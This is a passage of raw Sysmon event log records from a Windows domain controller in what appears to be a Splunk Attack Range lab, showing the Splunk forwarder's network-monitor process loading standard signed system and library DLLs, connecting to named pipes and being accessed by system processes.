Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2228728AFB522BA58200E7E00463DEF,SHA256=10C9AFBCBC1C64B26A4268C386313AEEFDE15F7A4467D1ADDC635390B7E9F3BDfalsetrue 23542300x800000000000000057350308Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.724{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=347A8F8D7F848A37F8AE92983D94273A,SHA256=C68F1A77C03CAB33593149D7CA2F338E75E3F142FB4405B86828AB694A031056falsetrue 734700x800000000000000057350307Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.560{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057350306Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.560{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057350305Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.560{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057350304Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:08.560{8B6011A9-5BBC-618E-63F3-04000000F101}10088\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057350303Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.560{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057350302Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:08.560{8B6011A9-5BBC-618E-63F3-04000000F101}10088\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057350301Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.560{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057350300Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.560{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057350299Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.560{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057350298Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.560{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057350297Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057350296Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057350295Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057350294Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057350293Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057350292Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057350291Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057350290Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057350289Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057350288Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057350287Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057350286Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057350285Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057350284Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057350283Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057350282Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057350281Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057350280Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057350279Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057350278Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057350277Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057350276Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000057350275Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057350274Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057350273Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057350272Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000057350271Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057350270Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000057350269Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057350268Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057350267Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057350266Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 10341000x800000000000000057350265Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057350264Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057350263Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.544{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057350262Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.528{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057350261Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.528{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3trueSplunk, Inc.Valid 10341000x800000000000000057350260Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.528{8B6011A9-8868-6164-0500-00000000F101}424440C:\Windows\system32\csrss.exe{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057350259Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.528{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5BBC-618E-63F3-04000000F101}10088C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 